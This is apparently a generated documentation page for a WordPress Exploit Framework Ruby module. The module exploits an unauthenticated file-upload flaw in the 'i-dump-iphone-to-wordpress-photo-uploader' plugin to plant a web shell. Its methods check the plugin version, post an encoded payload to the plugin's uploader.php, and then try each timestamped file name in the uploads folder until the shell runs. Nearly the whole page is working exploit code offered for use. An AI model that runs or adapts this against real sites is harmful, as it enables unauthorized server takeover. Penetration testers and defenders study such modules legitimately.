class Wpxf::Exploit::WindowsDesktopAndIphonePhotoUploaderShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/windows_desktop_and_iphone_photo_uploader_shell_upload.rb, line 6 def initialize super update_info( name: 'Windows Desktop And iPhone Photo Uploader Unauthenticated Shell Upload', author: [ 'Manish Kishan Tanwar AKA error1046', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '7893'] ], date: 'Apr 09 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/windows_desktop_and_iphone_photo_uploader_shell_upload.rb, line 22 def check check_plugin_version_from_readme('i-dump-iphone-to-wordpress-photo-uploader') end
execute_payload(_payload_url)
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload#execute_payload
# File lib/wpxf/modules/exploit/shell/windows_desktop_and_iphone_photo_uploader_shell_upload.rb, line 37 def execute_payload(_payload_url) @end_timestamp = Time.now.to_i base_upload_uri = normalize_uri(wordpress_url_uploads, 'i-dump-uploads') (@start_timestamp..@end_timestamp).each do |timestamp| super(normalize_uri(base_upload_uri, "-#{timestamp}-#{payload_name}")) end end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/windows_desktop_and_iphone_photo_uploader_shell_upload.rb, line 30 def payload_body_builder @start_timestamp = Time.now.to_i builder = Utility::BodyBuilder.new builder.add_file_from_string('file', payload.encoded, payload_name) builder end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/windows_desktop_and_iphone_photo_uploader_shell_upload.rb, line 26 def uploader_url normalize_uri(wordpress_url_plugins, 'i-dump-iphone-to-wordpress-photo-uploader', 'uploader.php') end